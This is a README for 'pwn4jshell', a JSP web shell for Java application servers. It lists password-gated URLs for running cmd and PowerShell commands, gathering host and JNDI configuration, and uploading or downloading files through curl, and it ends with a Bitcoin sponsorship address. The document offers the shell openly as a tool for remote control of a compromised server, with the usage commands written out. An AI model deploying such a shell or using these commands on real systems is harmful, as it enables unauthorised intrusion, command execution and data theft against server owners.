Awesome
pwn4jshell
Java Web shell project
Idea of creating, webshell with suport to old versions of java. Building it in jsp means the code compilation will happend at the server side with the server compiler, making it easyer and less likely to run into compatibility issues. Other than api... and sintax things should be easy.
Credits
Some of the code in this project is based on work from other ppl.
For file upload based on Boris Von Leosch.
Example
Get basic host information.
Information includes java system properties. Global JNDI Config if specifically if they implement DataSource. Hostname and Ip configuration.
http://{ip}:8080/pwn4jshell/shell.jsp?pass=key
Execute CMD command Execution
http://{ip}:8080/pwn4jshell/?pass=key&action=exec&args=dir
Powershell Command execution
http://{ip}:8080/pwn4jshell/?pass=key&action=power&args=dir
Upload a file
curl -X POST -F "file=@{file to upload}" "http://{ip}:8080/?pass=key&action=up&path={destination}"
if the path is not set the file will be placed in the same dir as the shell.jsp
Download file or directory
curl "http://{ip}:8080/pwn4jshell/?pass=key&action=down&path={pathToFile}&args=shell.jsp"
same as upload if path is not set will try to download the file from the same dir as shell.jsp
sponsor de project.
BTC: bc1qhzp6d5rtczyffwfaqxlca8cfqhc5m0xzarjy6ve8ujmxmgecmpeq08vppv